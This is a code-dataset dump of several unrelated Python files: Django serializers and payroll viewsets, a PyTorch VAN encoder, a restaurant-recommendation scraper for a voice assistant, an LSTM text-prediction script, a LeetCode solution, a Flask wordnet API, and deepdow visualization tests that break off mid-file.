+{"seq_id":"17187909144","text":"from rest_framework import serializers\nfrom .models import PostComment\n\nfrom streams.settings import DEFAULT_PROFILE_IMAGE\n\n\nclass PostCommentSerializer(serializers.ModelSerializer):\n handle = serializers.CharField(source='owner.handle', read_only=True)\n profile_image = serializers.SerializerMethodField(read_only=True)\n # created_at = serializers.SerializerMethodField(method_name='get_created_at', read_only=True)\n # updated_at = serializers.SerializerMethodField(method_name='get_updated_at', read_only=True)\n\n class Meta:\n model = PostComment\n fields = ['id', 'post', 'owner', 'handle', 'profile_image', 'text', 'is_deleted', 'created_at', 'updated_at']\n read_only_fields = ('id', 'post', 'owner')\n\n def create(self, validated_data):\n id = self.context.get('id')\n post = self.context.get('post')\n owner = self.context.get('owner')\n return PostComment.objects.create(id=id, post=post, owner=owner, **validated_data)\n\n @staticmethod\n def get_profile_image(instance):\n if instance.owner.image:\n return instance.owner.image\n return DEFAULT_PROFILE_IMAGE\n\n @staticmethod\n def get_created_at(instance):\n return instance.created_at.isoformat()\n\n @staticmethod\n def get_updated_at(instance):\n return instance.updated_at.isoformat()\n\n# class CommentSerializer(serializers.ModelSerializer):\n# created_at = serializers.SerializerMethodField(method_name='get_created_at', read_only=True)\n# updated_at = serializers.SerializerMethodField(method_name='get_updated_at', read_only=True)\n#\n# class Meta:\n# model = Comment\n# fields = ['id', 'post', 'parent', 'account', 'caption', 'is_deleted', 'created_at', 'updated_at']\n# read_only_fields = ['account', 'is_deleted']\n#\n# def create(self, validated_data):\n# account = self.context.get('account')\n# # post = self.context.get('post')\n# return Comment.objects.create(account=account, **validated_data)\n#\n# def get_created_at(self, instance):\n# return instance.created_at.isoformat()\n#\n# def get_updated_at(self, instance):\n# return instance.updated_at.isoformat()\n","repo_name":"johnvaught/streams-backend","sub_path":"streams/apps/comments/serlializers.py","file_name":"serlializers.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4470928768","text":"\nfrom employee.models import Station, Plantilla, Employee, EmployeeEducationalBackground, EmployeeEligibility\nfrom django.db.models import Q\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework import viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\n\nfrom .pagination import EmployeeListPagination\nfrom .serializers import (\n StationSerializer,\n PlantillaSerializer,\n EmployeeListSerializer,\n EmployeeCreateFormSerializer,\n EmployeeUpdatePersonalDetailsFormSerializer,\n EmployeeUpdateAppointmentDetailsFormSerializer,\n EmployeeDetailsSerializer,\n EmployeeBulkDeleteSerializer,\n EmployeeEducationalBackgroundSerializer,\n EmployeeEligibilitySerializer\n)\n\n\n\nclass StationViewSet(viewsets.ModelViewSet):\n queryset = Station.objects.all()\n serializer_class = StationSerializer\n\n @action(methods=['get'], detail=False)\n def get_all(self, request):\n station_queryset = Station.objects.all()\n serializer = self.get_serializer(station_queryset, many=True)\n return Response(serializer.data, 200)\n\n\n\nclass PlantillaViewSet(viewsets.ModelViewSet):\n queryset = Plantilla.objects.all()\n serializer_class = PlantillaSerializer\n\n @action(methods=['get'], detail=False)\n def get_all_open_by_station(self, request):\n station = request.GET.get('s') \n filter_conditions = Q()\n plantilla_queryset = []\n if station != \"\":\n filter_conditions.add(Q(station=station), Q.AND)\n filter_conditions.add(Q(is_open=1), Q.AND)\n plantilla_queryset = Plantilla.objects.all().filter(filter_conditions)\n serializer = self.get_serializer(plantilla_queryset, many=True)\n return Response(serializer.data, 200)\n\n\n\nclass EmployeeViewSet(viewsets.ModelViewSet):\n queryset = Employee.objects.all()\n serializer_class = EmployeeListSerializer\n pagination_class = EmployeeListPagination\n\n def list(self, request):\n search = request.GET.get('q', None)\n is_active = request.GET.get('ia', None) \n station = request.GET.get('st', None) \n sex = request.GET.get('se', None)\n civil_status = request.GET.get('cs', None)\n application_status = request.GET.get('as', None) \n level = request.GET.get('l', None) \n firstday_gov_from = request.GET.get('fd_g_f', None) \n firstday_gov_to = request.GET.get('fd_g_t', None) \n firstday_sra_from = request.GET.get('fd_s_f', None) \n firstday_sra_to = request.GET.get('fd_s_t', None) \n first_appointment_from = request.GET.get('f_appt_f', None) \n first_appointment_to = request.GET.get('f_appt_t', None) \n last_appointment_from = request.GET.get('l_appt_f', None) \n last_appointment_to = request.GET.get('l_appt_t', None) \n last_step_increment_from = request.GET.get('l_si_f', None) \n last_step_increment_to = request.GET.get('l_si_t', None) \n last_adjustment_from = request.GET.get('l_adj_f', None) \n last_adjustment_to = request.GET.get('l_adj_t', None) \n last_promotion_from = request.GET.get('l_prom_f', None) \n last_promotion_to = request.GET.get('l_prom_t', None)\n filter_conditions = Q()\n\n if search:\n filter_conditions.add(\n Q(fullname__icontains=search) \n | Q(employee_id__icontains=search) \n | Q(position__icontains=search) \n | Q(address_present__icontains=search) \n | Q(address_permanent__icontains=search) \n | Q(place_of_birth__icontains=search) \n | Q(tin__icontains=search) \n | Q(gsis__icontains=search) \n | Q(philhealth__icontains=search) \n | Q(pagibig__icontains=search) \n | Q(sss__icontains=search) \n | Q(station_link__name__icontains=search),\n Q.AND\n )\n if is_active:\n filter_conditions.add(Q(is_active = is_active), Q.AND)\n if station:\n filter_conditions.add(Q(station = station), Q.AND)\n if sex:\n filter_conditions.add(Q(sex = sex), Q.AND)\n if civil_status:\n filter_conditions.add(Q(civil_status = civil_status), Q.AND)\n if application_status:\n filter_conditions.add(Q(application_status = application_status), Q.AND)\n if level:\n filter_conditions.add(Q(level = level), Q.AND)\n if firstday_gov_from and firstday_gov_to:\n filter_conditions.add(Q(firstday_gov__range = (firstday_gov_from, firstday_gov_to)), Q.AND)\n if firstday_sra_from and firstday_sra_to:\n filter_conditions.add(Q(firstday_sra__range = (firstday_sra_from, firstday_sra_to)), Q.AND)\n if first_appointment_from and first_appointment_to:\n filter_conditions.add(Q(first_appointment__range = (first_appointment_from, first_appointment_to)), Q.AND)\n if last_appointment_from and last_appointment_to:\n filter_conditions.add(Q(last_appointment__range = (last_appointment_from, last_appointment_to)), Q.AND)\n if last_step_increment_from and last_step_increment_to:\n filter_conditions.add(Q(last_step_increment__range = (last_step_increment_from, last_step_increment_to)), Q.AND)\n if last_adjustment_from and last_adjustment_to:\n filter_conditions.add(Q(last_adjustment__range = (last_adjustment_from, last_adjustment_to)), Q.AND)\n if last_promotion_from and last_promotion_to:\n filter_conditions.add(Q(last_promotion__range = (last_promotion_from, last_promotion_to)), Q.AND)\n \n page = self.paginate_queryset(self.queryset.filter(filter_conditions).order_by(self.__sort_field()))\n serializer = self.get_serializer(page, many=True)\n return self.get_paginated_response(serializer.data)\n\n\n def __sort_field(self):\n field = '-updated_at'\n sort_field = self.request.GET.get('sort_field', None)\n sort_order = self.request.GET.get('sort_order', None)\n available_sort_fields = Employee().SORTABLE_FIELDS\n if sort_field:\n if sort_field in available_sort_fields:\n if sort_order == \"desc\":\n field = \"-\"+sort_field\n else:\n field = sort_field\n return field\n\n\n def create(self, request):\n serializer = EmployeeCreateFormSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n try:\n employee = Employee()\n # Personal Details\n employee.firstname = serializer.data['firstname'].upper()\n employee.middlename = serializer.data['middlename'].upper()\n employee.lastname = serializer.data['lastname'].upper()\n employee.suffixname = serializer.data['suffixname']\n employee.set_fullname(\n serializer.data['lastname'], \n serializer.data['firstname'], \n serializer.data['middlename'], \n serializer.data['suffixname']\n )\n employee.address_present = serializer.data['address_present']\n employee.address_permanent = serializer.data['address_permanent']\n employee.birthdate = serializer.data['birthdate']\n employee.place_of_birth = serializer.data['place_of_birth']\n employee.sex = serializer.data['sex']\n employee.civil_status = serializer.data['civil_status']\n employee.tel_no = serializer.data['tel_no']\n employee.cell_no = serializer.data['cell_no']\n employee.email_address = serializer.data['email_address']\n employee.spouse_name = serializer.data['spouse_name']\n employee.spouse_occupation = serializer.data['spouse_occupation']\n employee.no_of_children = serializer.data['no_of_children']\n employee.height = serializer.data['height']\n employee.weight = serializer.data['weight']\n employee.religion = serializer.data['religion']\n employee.blood_type = serializer.data['blood_type']\n # Appointment Details\n employee.employee_id = serializer.data['employee_id'] \n employee.position = serializer.data['position'].upper()\n employee.is_active = serializer.data['is_active']\n employee.salary_grade = serializer.data['salary_grade']\n employee.step_increment = serializer.data['step_increment']\n employee.application_status = serializer.data['application_status']\n employee.tax_status = serializer.data['tax_status']\n employee.monthly_salary = serializer.data['monthly_salary']\n employee.set_level(serializer.data['salary_grade'])\n employee.firstday_gov = serializer.data['firstday_gov']\n employee.firstday_sra = serializer.data['firstday_sra']\n employee.first_appointment = serializer.data['first_appointment']\n employee.last_appointment = serializer.data['last_appointment']\n employee.last_step_increment = serializer.data['last_step_increment']\n employee.last_adjustment = serializer.data['last_adjustment']\n employee.last_promotion = serializer.data['last_promotion']\n employee.original_appointment = serializer.data['original_appointment']\n employee.adjustment_date = serializer.data['adjustment_date']\n employee.adjustment_date = serializer.data['adjustment_date']\n employee.tin = serializer.data['tin']\n employee.gsis = serializer.data['gsis']\n employee.philhealth = serializer.data['philhealth']\n employee.pagibig = serializer.data['pagibig']\n employee.sss = serializer.data['sss']\n employee.created_by_id = request.user.id\n employee.updated_by_id = request.user.id\n employee.save()\n return Response({\"id\":employee.id}, 201)\n except:\n return Response({}, 500)\n\n\n\n def retrieve(self, request, pk=None):\n employee = get_object_or_404(self.queryset, id=pk)\n serializer = EmployeeDetailsSerializer(employee)\n return Response(serializer.data, 200)\n\n\n def partial_update(self, request, pk=None):\n # Personal Details\n if request.data['form_type'] == \"PD\":\n serializer = EmployeeUpdatePersonalDetailsFormSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n try:\n employee = get_object_or_404(self.queryset, id=pk)\n employee.firstname = serializer.data['firstname'].upper()\n employee.middlename = serializer.data['middlename'].upper()\n employee.lastname = serializer.data['lastname'].upper()\n employee.suffixname = serializer.data['suffixname']\n employee.set_fullname(\n serializer.data['lastname'], \n serializer.data['firstname'], \n serializer.data['middlename'], \n serializer.data['suffixname']\n )\n employee.address_present = serializer.data['address_present']\n employee.address_permanent = serializer.data['address_permanent']\n employee.birthdate = serializer.data['birthdate']\n employee.place_of_birth = serializer.data['place_of_birth']\n employee.sex = serializer.data['sex']\n employee.civil_status = serializer.data['civil_status']\n employee.tel_no = serializer.data['tel_no']\n employee.cell_no = serializer.data['cell_no']\n employee.email_address = serializer.data['email_address']\n employee.spouse_name = serializer.data['spouse_name']\n employee.spouse_occupation = serializer.data['spouse_occupation']\n employee.no_of_children = serializer.data['no_of_children']\n employee.height = serializer.data['height']\n employee.weight = serializer.data['weight']\n employee.religion = serializer.data['religion']\n employee.blood_type = serializer.data['blood_type']\n employee.created_by_id = request.user.id\n employee.updated_by_id = request.user.id\n employee.save()\n return Response({}, 201)\n except:\n return Response({}, 500)\n # Appointment Details\n elif request.data['form_type'] == \"AD\":\n serializer = EmployeeUpdateAppointmentDetailsFormSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n try:\n employee = get_object_or_404(self.queryset, id=pk)\n employee.employee_id = serializer.data['employee_id'] \n employee.position = serializer.data['position'].upper()\n employee.is_active = serializer.data['is_active']\n employee.salary_grade = serializer.data['salary_grade']\n employee.step_increment = serializer.data['step_increment']\n employee.application_status = serializer.data['application_status']\n employee.tax_status = serializer.data['tax_status']\n employee.monthly_salary = serializer.data['monthly_salary']\n employee.set_level(serializer.data['salary_grade'])\n employee.firstday_gov = serializer.data['firstday_gov']\n employee.firstday_sra = serializer.data['firstday_sra']\n employee.first_appointment = serializer.data['first_appointment']\n employee.last_appointment = serializer.data['last_appointment']\n employee.last_step_increment = serializer.data['last_step_increment']\n employee.last_adjustment = serializer.data['last_adjustment']\n employee.last_promotion = serializer.data['last_promotion']\n employee.original_appointment = serializer.data['original_appointment']\n employee.adjustment_date = serializer.data['adjustment_date']\n employee.adjustment_date = serializer.data['adjustment_date']\n employee.tin = serializer.data['tin']\n employee.gsis = serializer.data['gsis']\n employee.philhealth = serializer.data['philhealth']\n employee.pagibig = serializer.data['pagibig']\n employee.sss = serializer.data['sss']\n employee.created_by_id = request.user.id\n employee.updated_by_id = request.user.id\n employee.save()\n return Response({}, 201)\n except:\n return Response({}, 500)\n else:\n return Response({\"form_type\" : \"Invalid Form Type!\"}, 400)\n\n\n def destroy(self, request, pk=None):\n try:\n employee = get_object_or_404(self.queryset, id=pk)\n employee.delete()\n return Response({}, 200)\n except:\n return Response({}, 500)\n\n\n @action(methods=['delete'], detail=False)\n def bulk_destroy(self, request):\n serializer = EmployeeBulkDeleteSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n ids = serializer.data['ids']\n try:\n for data in ids: \n employee = get_object_or_404(self.queryset, id=data)\n employee.delete()\n return Response({}, 200)\n except:\n return Response({}, 500)\n\n\n @action(methods=['get'], detail=False)\n def get_all(self, request):\n employee_queryset = Employee.objects.all()\n serializer = self.get_serializer(employee_queryset, many=True)\n return Response(serializer.data, 200)\n\n\n\nclass EmployeeEducationalBackgroundViewSet(viewsets.ModelViewSet):\n queryset = EmployeeEducationalBackground.objects.all()\n serializer_class = EmployeeEducationalBackgroundSerializer\n\n def create(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n try: \n employee = get_object_or_404(Employee.objects, id=serializer.data['employee'])\n employee_educ_bg = EmployeeEducationalBackground()\n employee_educ_bg.employee = employee\n employee_educ_bg.level = serializer.data['level']\n employee_educ_bg.school = serializer.data['school']\n employee_educ_bg.course = serializer.data['course']\n employee_educ_bg.date_from = serializer.data['date_from']\n employee_educ_bg.date_to = serializer.data['date_to']\n employee_educ_bg.units = serializer.data['units']\n employee_educ_bg.graduate_year = serializer.data['graduate_year']\n employee_educ_bg.scholarship = serializer.data['scholarship']\n employee_educ_bg.honor = serializer.data['honor']\n employee_educ_bg.save()\n return Response({}, 201)\n except:\n return Response({}, 500)\n\n\n def retrieve(self, request, pk=None):\n employee_educ_bg = get_object_or_404(self.queryset, id=pk)\n serializer = self.get_serializer(employee_educ_bg)\n return Response(serializer.data, 200)\n \n\n def update(self, request, pk=None):\n employee_educ_bg = get_object_or_404(self.queryset, id=pk)\n serializer = self.get_serializer(data=request.data)\n try:\n serializer.is_valid(raise_exception=True)\n employee_educ_bg.level = serializer.data['level']\n employee_educ_bg.school = serializer.data['school']\n employee_educ_bg.course = serializer.data['course']\n employee_educ_bg.date_from = serializer.data['date_from']\n employee_educ_bg.date_to = serializer.data['date_to']\n employee_educ_bg.units = serializer.data['units']\n employee_educ_bg.graduate_year = serializer.data['graduate_year']\n employee_educ_bg.scholarship = serializer.data['scholarship']\n employee_educ_bg.honor = serializer.data['honor']\n employee_educ_bg.save()\n return Response({}, 201)\n except:\n return Response({}, 500)\n\n\n def destroy(self, request, pk=None):\n try:\n employee_educ_bg = get_object_or_404(self.queryset, id=pk)\n employee_educ_bg.delete()\n return Response({}, 200)\n except:\n return Response({}, 500)\n\n\n\nclass EmployeeEligibilityViewSet(viewsets.ModelViewSet):\n queryset = EmployeeEligibility.objects.all()\n serializer_class = EmployeeEligibilitySerializer\n\n def create(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n try: \n employee = get_object_or_404(Employee.objects, id=serializer.data['employee'])\n employee_elig = EmployeeEligibility()\n employee_elig.employee = employee\n employee_elig.eligibility = serializer.data['eligibility']\n employee_elig.level = serializer.data['level']\n employee_elig.rating = serializer.data['rating']\n employee_elig.exam_place = serializer.data['exam_place']\n employee_elig.exam_date = serializer.data['exam_date']\n employee_elig.license_no = serializer.data['license_no']\n employee_elig.license_validity = serializer.data['license_validity']\n employee_elig.save()\n return Response({}, 201)\n except:\n return Response({}, 500)\n\n\n def retrieve(self, request, pk=None):\n employee_elig = get_object_or_404(self.queryset, id=pk)\n serializer = self.get_serializer(employee_elig)\n return Response(serializer.data, 200)\n \n\n def update(self, request, pk=None):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n try:\n employee_elig = get_object_or_404(self.queryset, id=pk)\n employee_elig.eligibility = serializer.data['eligibility']\n employee_elig.level = serializer.data['level']\n employee_elig.rating = serializer.data['rating']\n employee_elig.exam_place = serializer.data['exam_place']\n employee_elig.exam_date = serializer.data['exam_date']\n employee_elig.license_no = serializer.data['license_no']\n employee_elig.license_validity = serializer.data['license_validity']\n employee_elig.save()\n return Response({}, 201)\n except:\n return Response({}, 500)\n\n\n def destroy(self, request, pk=None):\n try:\n employee_elig = get_object_or_404(self.queryset, id=pk)\n employee_elig.delete()\n return Response({}, 200)\n except:\n return Response({}, 500)\n\n\n\n\n\n\n\n\n\n\n\n \n","repo_name":"devbertram/django_government_payroll","sub_path":"employee/api/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":21068,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"25981169608","text":"# ~*~ encoding: utf-8 ~*~\n\nfrom django.utils.translation import ugettext_lazy as _\n\naction_messages = {\n \"page_created\": _(\"Page created successfuly\"),\n \"page_updated\": _(\"Page updated successfuly\"),\n \"page_reverted\": _(\"Page reverted to revision %s\"),\n}\n\n","repo_name":"altunyurt/djiggy","sub_path":"main/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43599203402","text":"from __future__ import absolute_import, division, print_function\n\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torchvision.models as models\nimport torch.utils.model_zoo as model_zoo\nfrom .van import *\nfrom timm.models import create_model\nfrom .van import OverlapPatchEmbed\n\n\nclass ResNetMultiImageInput(models.ResNet):\n \"\"\"Constructs a resnet model with varying number of input images.\n Adapted from https://github.com/pytorch/vision/blob/master/torchvision/models/resnet.py\n \"\"\"\n def __init__(self, block, layers, num_classes=1000, num_input_images=1):\n super(ResNetMultiImageInput, self).__init__(block, layers)\n self.inplanes = 64\n self.conv1 = nn.Conv2d(\n num_input_images * 3, 64, kernel_size=7, stride=2, padding=3, bias=False)\n self.bn1 = nn.BatchNorm2d(64)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n self.layer1 = self._make_layer(block, 64, layers[0])\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2)\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n\ndef van_multiimage_input(size_encoder, pretrained=False, num_input_images=1):\n \"\"\"Constructs a VAN model.\n Args:\n num_layers (int): Number of resnet layers. Must be 18 or 50\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n num_input_images (int): Number of frames stacked as input\n \"\"\"\n assert num_layers in [18, 50], \"Can only run with 18 or 50 layer resnet\"\n blocks = {18: [2, 2, 2, 2], 50: [3, 4, 6, 3]}[num_layers]\n block_type = {18: models.resnet.BasicBlock, 50: models.resnet.Bottleneck}[num_layers]\n model = ResNetMultiImageInput(block_type, blocks, num_input_images=num_input_images)\n\n if pretrained:\n loaded = model_zoo.load_url(models.resnet.model_urls['resnet{}'.format(num_layers)])\n loaded['patch_embed1.weight'] = torch.cat(\n [loaded['conv1.weight']] * num_input_images, 1) / num_input_images\n model.load_state_dict(loaded)\n return model\n\n \nclass VANEncoder(nn.Module):\n \"\"\"Pytorch module for a resnet encoder\n \"\"\"\n def __init__(self, size_encoder, pretrained, num_input_images=1):\n super(VANEncoder, self).__init__()\n \n van_paths = {\"tiny\": \"./pretrained/van_tiny_754.pth.tar\",\n #van_paths = {\"tiny\": \"./pretrained/van_tiny_seg.pth\",\n #\"small\": \"./pretrained/van_small_seg.pth\",\n \"small\": \"./pretrained/van_small_811.pth.tar\",\n \"base\": \"./pretrained/van_base_828.pth.tar\"\n }\n if size_encoder=='tiny':\n self.num_ch_enc = np.array([32, 64, 160, 256])\n else:\n self.num_ch_enc = np.array([64, 128, 320, 512])\n \n if size_encoder not in van_paths:\n raise ValueError(\"{} is not a valid size of vnn\".format(size_encoder))\n\n if num_input_images > 1:\n #self.encoder = van_multiimage_input(num_layers, pretrained, num_input_images)\n self.encoder = create_model(\"van_{}\".format(size_encoder), pretrained=False, num_classes=None, drop_rate=0.0, drop_path_rate=0.1, drop_block_rate=None)\n\n self.encoder.patch_embed1 = OverlapPatchEmbed(in_chans=3*num_input_images, embed_dim = self.num_ch_enc[0])\n if pretrained:\n pretrined_state_dict = torch.load(van_paths[size_encoder])['state_dict']\n pretrined_state_dict['patch_embed1.proj.weight'] = torch.cat(\n [pretrined_state_dict['patch_embed1.proj.weight']] * num_input_images, 1) / num_input_images\n self.encoder.load_state_dict(pretrined_state_dict)\n else:\n self.encoder = create_model(\"van_{}\".format(size_encoder), pretrained=False, num_classes=None, drop_rate=0.0, drop_path_rate=0.1, drop_block_rate=None)\n \n if pretrained:\n encoder_dict = self.encoder.state_dict()\n pretrined_state_dict = torch.load(van_paths[size_encoder])['state_dict']\n load_state_dict = {k:v for k,v in pretrined_state_dict.items() if k in encoder_dict.keys()}\n encoder_dict.update(load_state_dict)\n self.encoder.load_state_dict(encoder_dict)\n \n\n\n def forward(self, input_image):\n self.features = []\n x = (input_image - 0.45) / 0.225\n \n B = x.shape[0]\n\n for i in range(4):\n patch_embed = getattr(self.encoder, f\"patch_embed{i + 1}\")\n block = getattr(self.encoder, f\"block{i + 1}\")\n norm = getattr(self.encoder, f\"norm{i + 1}\")\n x, H, W = patch_embed(x)\n for blk in block:\n #x = blk(x, H, W)\n x = blk(x)\n x = x.flatten(2).transpose(1, 2)\n x = norm(x)\n x = x.reshape(B, H, W, -1).permute(0, 3, 1, 2).contiguous()\n #if i != 3:\n #x = x.reshape(B, H, W, -1).permute(0, 3, 1, 2).contiguous()\n \n self.features.append(x)\n \n #print(x.shape)\n \n\n return self.features\n","repo_name":"xjixzz/vadepth-net","sub_path":"networks/van_encoder.py","file_name":"van_encoder.py","file_ext":"py","file_size_in_byte":5567,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"24327806743","text":"from speachModule import speak\nfrom takecommandModule import takeCommand\nimport random\nfrom bs4 import BeautifulSoup\nimport requests\nimport geocoder\n\nflag = 1\n\ng = geocoder.ip('me')\n\ndef rec_restaurant():\n try:\n speak(\"do you want recommendations for your current location\")\n a = takeCommand(flag).lower()\n if \"yes\" in a:\n city = g.city.lower()\n else: \n speak(\"give me a city name\")\n city = takeCommand(flag).lower()\n \n speak(\"what kind of dish or food you like\")\n dish = takeCommand(flag).lower()\n speak(\"sure....let me find something for you\")\n print(dish,city)\n url = 'https://www.zomato.com/'+city+'/restaurants/'+dish+'?category=0'\n header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36'}\n\n response = requests.get(url,headers=header)\n html = response.text\n\n soup = BeautifulSoup(html,'lxml')\n\n top_rest = soup.find('div',class_=\"orig-search-list-container\")\n restaurant = []\n rating = []\n\n rsts = top_rest.find_all('a',class_=\"result-title\")\n rate = top_rest.find_all('span',class_=\"rating-value\") \n for i in rate:\n x = i.text.replace(\"\\n\",\" \").strip()\n rating.append(x)\n for i in rsts:\n x = i.text.replace(\"\\n\",\" \").strip()\n restaurant.append(x)\n speak(\"Here are some place that you should try\")\n for i in range(0,5):\n print(restaurant[i]+\" rating \"+rating[i])\n speak(restaurant[i]+\" rating \"+rating[i])\n r = random.randrange(0,5,1)\n \n speak(\"but i think you should try \"+restaurant[r]+\" they have a good rating of \"+rating[r])\n except:\n speak(\"sorry something went wrong....please try again\")","repo_name":"shnkreddy98/Python-Voice-Assistant","sub_path":"restaurantModule.py","file_name":"restaurantModule.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2526833554","text":"# predicting text from .h5 trained model\n\nimport numpy as np\nimport LSTM_text_gen_v2 as trained_model\n\n#load saved weights \ntrained_model.model.load_weights(\"mary_shelly_text_Gen.h5\")\nstring_mapped = trained_model.X[99]\nfull_string = [trained_model.n_to_char[value] for value in string_mapped]\n\nfor i in range(400):\n x = np.reshape(string_mapped,(1 ,len(string_mapped), 1))\n x = x / float(len(trained_model.characters))\n\n pred_index = np.argmax(trained_model.model.predict(x, verbose=0))\n seq = [trained_model.n_to_char[value] for value in string_mapped]\n full_string.append(trained_model.n_to_char[pred_index])\n\n string_mapped.append(pred_index)\n string_mapped = string_mapped[1:len(string_mapped)]\n\ntxt = \"\"\nfor char in full_string:\n txt = txt + char\n\nprint(txt)","repo_name":"tonserrobo/AI_text_gen","sub_path":"LSTM_text_Gen_v2_prediction.py","file_name":"LSTM_text_Gen_v2_prediction.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21148423044","text":"class Solution:\n def twoCitySchedCost(self, costs: List[List[int]]) -> int:\n costs.sort(key=lambda cost: -abs(cost[0] - cost[1]))\n\n ret = 0\n assigned = [0, 0]\n\n for cost in costs:\n argmin = self.argmin(cost)\n\n if assigned[argmin] < len(costs) // 2:\n assigned[argmin] += 1\n ret += cost[argmin]\n else:\n assigned[1 - argmin] += 1\n ret += cost[1 - argmin]\n\n return ret\n\n def argmin(self, cost: List[int]) -> int:\n if cost[0] < cost[1]:\n return 0\n\n return 1\n","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/1029. Two City Scheduling/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"25795026892","text":"import os\nfrom app import app\nfrom wordnet import *\nfrom flask import jsonify, request\nimport json\nfrom .auth import requires_auth\n\n\nword_net = retrieve_net(\n os.path.dirname(os.path.dirname(os.path.abspath(__file__)))+'/data/network_sample.wrnt'\n )\n\n\nresource = {\n 1:{\n 'name':'Anurag',\n 'age':22\n },\n 2:{\n 'name': 'tushar',\n 'age': 17\n }\n}\n\n@app.route('/')\ndef home():\n return 'Hello There.'\n\n'''\nExample views: only experimental\n'''\n@app.route('/index/<id>')\ndef homeindex(id):\n return 'index'+str(id)\n\n@app.route('/api/<int:i>')\n@requires_auth\ndef api(i):\n if i not in resource : return not_found()\n resp = jsonify(resource[i])\n resp.status_code = 200\n return resp\n\n'''\nmain views start here onwards.\n'''\n@app.route('/api/net/<root>')\ndef get_words(root):\n output = {\n 'words': return_net(root, word_net, depth=1)\n }\n\n resp = jsonify(output)\n resp.status_code = 200\n return resp\n\n'''\nError Handlers\n'''\n@app.errorhandler(404)\ndef not_found(error=None):\n message = {\n 'status': 404,\n 'message': 'Not Found: ' + request.url,\n }\n resp = jsonify(message)\n resp.status_code = 404\n\n return resp\n\n","repo_name":"anuragkumarak95/wordnet-webapp","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23664226722","text":"import datetime\nfrom unittest.mock import MagicMock, Mock\n\nfrom matplotlib.animation import FuncAnimation\nfrom matplotlib.axes import Axes\nfrom matplotlib.colors import ListedColormap\nimport numpy as np\nimport pandas as pd\nimport pytest\n\nfrom deepdow.losses import MeanReturns\nfrom deepdow.visualize import (\n plot_weight_anim,\n plot_weight_heatmap,\n generate_cumrets,\n generate_metrics_table,\n generate_weights_table,\n plot_metrics,\n)\n\n\nclass TestGenerateCumrets:\n def test_errors(self, dataloader_dummy, network_dummy):\n with pytest.raises(TypeError):\n generate_cumrets({\"bm_1\": \"WRONG\"}, dataloader_dummy)\n\n with pytest.raises(TypeError):\n generate_cumrets({\"bm_1\": network_dummy}, \"FAKE\")\n\n def test_basic(self, dataloader_dummy, network_dummy):\n cumrets_dict = generate_cumrets(\n {\"bm_1\": network_dummy}, dataloader_dummy\n )\n\n assert isinstance(cumrets_dict, dict)\n assert len(cumrets_dict) == 1\n assert \"bm_1\" in cumrets_dict\n assert cumrets_dict[\"bm_1\"].shape == (\n len(dataloader_dummy.dataset),\n dataloader_dummy.horizon,\n )\n\n\nclass TestGenerateMetricsTable:\n def test_errors(self, dataloader_dummy, network_dummy):\n with pytest.raises(TypeError):\n generate_metrics_table(\n {\"bm_1\": \"WRONG\"}, dataloader_dummy, {\"metric\": MeanReturns()}\n )\n\n with pytest.raises(TypeError):\n generate_metrics_table(\n {\"bm_1\": network_dummy}, \"FAKE\", {\"metric\": MeanReturns()}\n )\n\n with pytest.raises(TypeError):\n generate_metrics_table(\n {\"bm_1\": network_dummy}, dataloader_dummy, {\"metric\": \"FAKE\"}\n )\n\n def test_basic(self, dataloader_dummy, network_dummy):\n metrics_table = generate_metrics_table(\n {\"bm_1\": network_dummy}, dataloader_dummy, {\"rets\": MeanReturns()}\n )\n\n assert isinstance(metrics_table, pd.DataFrame)\n assert len(metrics_table) == len(dataloader_dummy.dataset)\n assert {\"metric\", \"value\", \"benchmark\", \"timestamp\"} == set(\n metrics_table.columns.to_list()\n )\n\n\ndef test_plot_metrics(monkeypatch):\n n_entries = 100\n metrics_table = pd.DataFrame(\n np.random.random((n_entries, 2)), columns=[\"value\", \"timestamp\"]\n )\n metrics_table[\"metric\"] = \"M\"\n 